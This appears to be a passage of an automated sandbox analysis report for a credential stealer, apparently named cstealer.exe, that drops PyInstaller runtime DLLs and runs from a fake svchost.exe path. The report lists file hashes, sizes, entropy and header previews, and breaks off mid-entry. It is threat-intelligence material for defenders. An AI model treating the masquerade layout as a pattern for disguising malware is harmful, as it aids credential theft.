                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.................................................................`..........................................1..L"..LS..................\....p...)..........`...T........................... ...@...............(............................text............................... ..`.rdata..............................@..@.data....G...p...>...H..............@....pdata..\...........................@..@.rsrc................X..............@..@.reloc...............b..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\unicodedata.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1138040
                                                                                                                                                          Entropy (8bit):5.434701276929729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:JbYefjwR6nbJonRiPDjRrO518BEPYPx++ZiLKGZ5KXyVH4eDS0E:tYeMQ0IDJc+EwPgPOG6Xyd46S0E
                                                                                                                                                          MD5:BC58EB17A9C2E48E97A12174818D969D
                                                                                                                                                          SHA1:11949EBC05D24AB39D86193B6B6FCFF3E4733CFD
                                                                                                                                                          SHA-256:ECF7836AA0D36B5880EB6F799EC402B1F2E999F78BFFF6FB9A942D1D8D0B9BAA
                                                                                                                                                          SHA-512:4AA2B2CE3EB47503B48F6A888162A527834A6C04D3B49C562983B4D5AAD9B7363D57AEF2E17FE6412B89A9A3B37FB62A4ADE4AFC90016E2759638A17B1DEAE6C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.>.......... *...................................................`.............................................X...(........`.......P.......4..x)...p......@]..T............................\..@............P..x............................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....0......................@....pdata.......P......."..............@..@.rsrc........`.......(..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\VCRUNTIME140.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98224
                                                                                                                                                          Entropy (8bit):6.452201564717313
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
                                                                                                                                                          MD5:F34EB034AA4A9735218686590CBA2E8B
                                                                                                                                                          SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
                                                                                                                                                          SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
                                                                                                                                                          SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\_brotli.cp310-win_amd64.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):820736
                                                                                                                                                          Entropy (8bit):6.056282443190043
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:tY0Uu7wLsglBv4i5DGAqXMAHhlyL82XTw05nmZfRFo:tp0NA1tAmZfR
                                                                                                                                                          MD5:EE3D454883556A68920CAAEDEFBC1F83
                                                                                                                                                          SHA1:45B4D62A6E7DB022E52C6159EEF17E9D58BEC858
                                                                                                                                                          SHA-256:791E7195D7DF47A21466868F3D7386CFF13F16C51FCD0350BF4028E96278DFF1
                                                                                                                                                          SHA-512:E404ADF831076D27680CC38D3879AF660A96AFC8B8E22FFD01647248C601F3C6C4585D7D7DC6BBD187660595F6A48F504792106869D329AA1A0F3707D7F777C6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.r.q...q...q...x...y......s...:...s......|......y......r.....r...q...L.....Q.....p.....p.....p...Richq...........PE..d... ..d.........." ...#.@...H.......F....................................................`.........................................@c..`....c.......................................9..............................P8..@............P...............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data........p.......`..............@....pdata...............h..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\_bz2.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):83736
                                                                                                                                                          Entropy (8bit):6.595094797707322
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
                                                                                                                                                          MD5:86D1B2A9070CD7D52124126A357FF067
                                                                                                                                                          SHA1:18E30446FE51CED706F62C3544A8C8FDC08DE503
                                                                                                                                                          SHA-256:62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
                                                                                                                                                          SHA-512:7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\_cffi_backend.cp310-win_amd64.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):181248
                                                                                                                                                          Entropy (8bit):6.188683787528254
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:rZ1fKD8GVLHASq0TTjfQxnkVB0hcspEsHS7iiSTLkKetJb9Pu:rZNRGVb9TTCnaZsuMXiSTLLeD9
                                                                                                                                                          MD5:EBB660902937073EC9695CE08900B13D
                                                                                                                                                          SHA1:881537ACEAD160E63FE6BA8F2316A2FBBB5CB311
                                                                                                                                                          SHA-256:52E5A0C3CA9B0D4FC67243BD8492F5C305FF1653E8D956A2A3D9D36AF0A3E4FD
                                                                                                                                                          SHA-512:19D5000EF6E473D2F533603AFE8D50891F81422C59AE03BEAD580412EC756723DC3379310E20CD0C39E9683CE7C5204791012E1B6B73996EA5CB59E8D371DE24
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih..-..C-..C-..C$qMC!..C.|.B/..CKf#C)..C.|.B&..C.|.B%..C.|.B)..Cfq.B)..C.|.B...C-..C...C.|.B)..C$qKC,..C.|.B,..C.|!C,..C.|.B,..CRich-..C........PE..d.....e.........." .........@...............................................0............`..........................................g..l...|g..................H............ .......M...............................M..8............................................text...h........................... ..`.rdata..l...........................@..@.data....\.......0...v..............@....pdata..H...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\_ctypes.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):123672
                                                                                                                                                          Entropy (8bit):6.047035801914277
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:0OEESRiaiH6lU1vxqfrId0sx3gVILLPykxA:hj+I1vAfrIRx3gN
                                                                                                                                                          MD5:1635A0C5A72DF5AE64072CBB0065AEBE
                                                                                                                                                          SHA1:C975865208B3369E71E3464BBCC87B65718B2B1F
                                                                                                                                                          SHA-256:1EA3DD3DF393FA9B27BF6595BE4AC859064CD8EF9908A12378A6021BBA1CB177
                                                                                                                                                          SHA-512:6E34346EA8A0AACC29CCD480035DA66E280830A7F3D220FD2F12D4CFA3E1C03955D58C0B95C2674AEA698A36A1B674325D3588483505874C2CE018135320FF99
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............d...d...d.......d...e...d...a...d...`...d...g...d.d.e...d...`...d...e...d.:.e...d...e.I.d.d.i...d.d.d...d.d...d.d.f...d.Rich..d.........................PE..d.....,d.........." ................@Z..............................................!.....`..........................................P.......P..................D......../..............T...........................0...8...............H............................text............................... ..`.rdata...k.......l..................@..@.data...T>...p...8...\..............@....pdata..D...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\_decimal.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):254744
                                                                                                                                                          Entropy (8bit):6.564308911485739
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
                                                                                                                                                          MD5:20C77203DDF9FF2FF96D6D11DEA2EDCF
                                                                                                                                                          SHA1:0D660B8D1161E72C993C6E2AB0292A409F6379A5
                                                                                                                                                          SHA-256:9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
                                                                                                                                                          SHA-512:2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\_hashlib.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):64792
                                                                                                                                                          Entropy (8bit):6.223467179037751
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
                                                                                                                                                          MD5:D4674750C732F0DB4C4DD6A83A9124FE
                                                                                                                                                          SHA1:FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
                                                                                                                                                          SHA-256:CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
                                                                                                                                                          SHA-512:97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\_lzma.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):158488
                                                                                                                                                          Entropy (8bit):6.8491143497239655
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
                                                                                                                                                          MD5:7447EFD8D71E8A1929BE0FAC722B42DC
                                                                                                                                                          SHA1:6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
                                                                                                                                                          SHA-256:60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
                                                                                                                                                          SHA-512:C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\_pytransform.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1165824
                                                                                                                                                          Entropy (8bit):7.0564514753444785
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:LsZDXB6wmcZzdcZ7fUoPHUEXLznTTenIGHSQt:QZDXB6wmcUfTKHHt
                                                                                                                                                          MD5:0359DFA90FFB2E190C91A4DE76E36BF7
                                                                                                                                                          SHA1:E4FFFAC0206C2E41B44898AAA49583212F406DEE
                                                                                                                                                          SHA-256:22C1CA2F788196DF27FDBE4A9B36CB7CBAE51CD38CF1C1ABF44BAD66CC82C236
                                                                                                                                                          SHA-512:AEC3EAE25FC4CEE3A1B6A9304369CEE8DA5CCC771971456B1FF0F750BB17C9BA038B26CAAF2421ACBB40AE9C4D79275C0D04045098D188926C84E25C532ABBD0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....b..........0..........p.....................................[........ .........................................+........................'...........................................`..(...................d................................text...ha.......b..................`.P`.data................f..............@.`..rdata..p............h..............@.`@.pdata...'.......(...V..............@.0@.xdata..L,...........~..............@.0@.bss....h.............................`..edata..+...........................@.0@.idata..............................@.0..CRT....X...........................@.@..tls................................@.@..reloc..............................@.0B........................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\_queue.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31512
                                                                                                                                                          Entropy (8bit):6.563116725717513
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:bxrUGCpa6rIxdK/rAwVILQU85YiSyvz5PxWEaAc:trUZIzYrAwVILQUG7SydPxDc
                                                                                                                                                          MD5:D8C1B81BBC125B6AD1F48A172181336E
                                                                                                                                                          SHA1:3FF1D8DCEC04CE16E97E12263B9233FBF982340C
                                                                                                                                                          SHA-256:925F05255F4AAE0997DC4EC94D900FD15950FD840685D5B8AA755427C7422B14
                                                                                                                                                          SHA-512:CCC9F0D3ACA66729832F26BE12F8E7021834BBEE1F4A45DA9451B1AA5C2E63126C0031D223AF57CF71FAD2C85860782A56D78D8339B35720194DF139076E0772
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a............................................V...................V......V......V......V......Rich....................PE..d.....,d.........." .........6......................................................N.....`.........................................@C..L....C..d....p.......`.......L.../...........3..T...........................p3..8............0.. ............................text...~........................... ..`.rdata.......0......................@..@.data........P.......8..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\_socket.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):79128
                                                                                                                                                          Entropy (8bit):6.284790077237953
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
                                                                                                                                                          MD5:819166054FEC07EFCD1062F13C2147EE
                                                                                                                                                          SHA1:93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
                                                                                                                                                          SHA-256:E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
                                                                                                                                                          SHA-512:DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\_ssl.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):160536
                                                                                                                                                          Entropy (8bit):6.027748879187965
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:OwYiZ+PtocHnVXhLlasuvMETxoEBA+nbUtGnBSonJCNI5ILC7Gax1:FYk+PtocHVxx/uvPCEwhGJ
                                                                                                                                                          MD5:7910FB2AF40E81BEE211182CFFEC0A06
                                                                                                                                                          SHA1:251482ED44840B3C75426DD8E3280059D2CA06C6
                                                                                                                                                          SHA-256:D2A7999E234E33828888AD455BAA6AB101D90323579ABC1095B8C42F0F723B6F
                                                                                                                                                          SHA-512:BFE6506FEB27A592FE9CF1DB7D567D0D07F148EF1A2C969F1E4F7F29740C6BB8CCF946131E65FE5AA8EDE371686C272B0860BD4C0C223195AAA1A44F59301B27
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.-...-...-.....-...,...-...(...-...)...-.......-.W.,...-.R.,...-...,...-...,...-.W. ...-.W.-...-.W....-.W./...-.Rich..-.................PE..d.....,d.........." ................l*..............................................%.....`.............................................d...........`.......P.......D.../...p..8.......T...............................8............................................text...(........................... ..`.rdata..6...........................@..@.data....j.......f..................@....pdata.......P....... ..............@..@.rsrc........`.......,..............@..@.reloc..8....p.......6..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-console-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22128
                                                                                                                                                          Entropy (8bit):4.746916379473427
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:HFOhEWhhW9DWGxVA6VWQ4iW7rd9ZnAOVX01k9z3AAcodV:HFdWhhWhxdm31AqR9z7BV
                                                                                                                                                          MD5:40BA4A99BF4911A3BCA41F5E3412291F
                                                                                                                                                          SHA1:C9A0E81EB698A419169D462BCD04D96EAA21D278
                                                                                                                                                          SHA-256:AF0E561BB3B2A13AA5CA9DFC9BC53C852BAD85075261AF6EF6825E19E71483A6
                                                                                                                                                          SHA-512:F11B98FF588C2E8A88FDD61D267AA46DC5240D8E6E2BFEEA174231EDA3AFFC90B991FF9AAE80F7CEA412AFC54092DE5857159569496D47026F8833757C455C23
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....dZ..........." .........0...............................................@............`A........................................p...,............0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-datetime-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.597173095457187
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:LWhhW8R9WvkJ0f5AbVWQ4mWC7ZNKd2kQX01k9z3Ad4+BhNKD:LWhhWgaab/NNPR9zw4fD
                                                                                                                                                          MD5:C5E3E5DF803C9A6D906F3859355298E1
                                                                                                                                                          SHA1:0ECD85619EE5CE0A47FF840652A7C7EF33E73CF4
                                                                                                                                                          SHA-256:956773A969A6213F4685C21702B9ED5BD984E063CF8188ACBB6D55B1D6CCBD4E
                                                                                                                                                          SHA-512:DEEDEF8EAAC9089F0004B6814862371B276FBCC8DF45BA7F87324B2354710050D22382C601EF8B4E2C5A26C8318203E589AA4CAF05EB2E80E9E8C87FD863DFC9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....N7.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-debug-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22128
                                                                                                                                                          Entropy (8bit):4.609345057720842
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:9WhhW1WGxVA6VWQ4cRWAAuENQlO8X01k9z3AenFbvrJ:9WhhWhxdleuEKlO8R9zhFHJ
                                                                                                                                                          MD5:71F1D24C7659171EAFEF4774E5623113
                                                                                                                                                          SHA1:8712556B19ED9F80B9D4B6687DECFEB671AD3BFE
                                                                                                                                                          SHA-256:C45034620A5BB4A16E7DD0AFF235CC695A5516A4194F4FEC608B89EABD63EEEF
                                                                                                                                                          SHA-512:0A14C03365ADB96A0AD539F8E8D8333C042668046CEA63C0D11C75BE0A228646EA5B3FBD6719C29580B8BAAEB7A28DC027AF3DE10082C07E089CDDA43D5C467A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....IL..........." .........0...............................................@............`A........................................p................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22112
                                                                                                                                                          Entropy (8bit):4.640577240680024
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:IzmxD3T4qbWhhWNc5WvkJ0f5AbVWQ4OWXIH52mvp13s5yX01k9z3A3MNL3:IzQNWhhWNchaabdHMmfcYR9zEMNr
                                                                                                                                                          MD5:F1534C43C775D2CCEB86F03DF4A5657D
                                                                                                                                                          SHA1:9ED81E2AD243965E1090523B0C915E1D1D34B9E1
                                                                                                                                                          SHA-256:6E6BFDC656F0CF22FABBA1A25A42B46120B1833D846F2008952FE39FE4E57AB2
                                                                                                                                                          SHA-512:62919D33C7225B7B7F97FAF4A59791F417037704EB970CB1CB8C50610E6B2E86052480CDBA771E4FAD9D06454C955F83DDB4AEA2A057725385460617B48F86A7
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@............`A........................................p................0...............0..`&..............p............................................................................rdata..H...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26224
                                                                                                                                                          Entropy (8bit):4.864482970861573
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:xaNYPvVX8rFTsiWhhWWnWGxVA6VWQ4cRWtlAd9ZnAOVX01k9z3AAcosm6:nPvVXkWhhWQxdlP31AqR9z76
                                                                                                                                                          MD5:EA00855213F278D9804105E5045E2882
                                                                                                                                                          SHA1:07C6141E993B21C4AA27A6C2048BA0CFF4A75793
                                                                                                                                                          SHA-256:F2F74A801F05AB014D514F0F1D0B3DA50396E6506196D8BECCC484CD969621A6
                                                                                                                                                          SHA-512:B23B78B7BD4138BB213B9A33120854249308BB2CF0D136676174C3D61852A0AC362271A24955939F04813CC228CD75B3E62210382A33444165C6E20B5E0A7F24
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....(............" .........@...............................................P............`A........................................p................@...............@..p&..............p............................................................................rdata..|........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
